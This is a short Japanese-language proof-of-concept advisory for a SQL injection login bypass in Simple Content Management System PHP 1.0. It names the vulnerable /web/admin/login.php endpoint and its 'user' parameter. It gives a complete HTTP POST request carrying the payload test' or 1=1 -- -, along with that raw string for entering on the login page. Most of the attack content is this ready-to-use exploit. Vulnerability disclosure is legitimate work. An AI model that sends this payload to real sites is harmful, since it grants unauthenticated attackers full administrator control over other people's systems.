
Simple Content Management System PHPにおけるSQLインジェクション認証バイパスの概念実証。認証されていない攻撃者が細工したuserパラメータを介して管理者アクセスを取得できるようにします。
Simple Content Management System PHPの管理ログインページにSQLインジェクションの脆弱性が存在します。userパラメータはSQLクエリに渡される前にサニタイズされていないため、認証されていない攻撃者が認証をバイパスして完全な管理者アクセスを取得できます。
/web/admin/login.phpusercode-projects.org
Simple Content Management System PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
または、ログインページに直接追加します

test' or 1=1 -- -

認証されていないリモート攻撃者は、資格情報を知らなくても管理者ログインを完全にバイパスし、コンテンツの追加を含む管理パネルへの完全な制御を取得できます。
Imad Alvi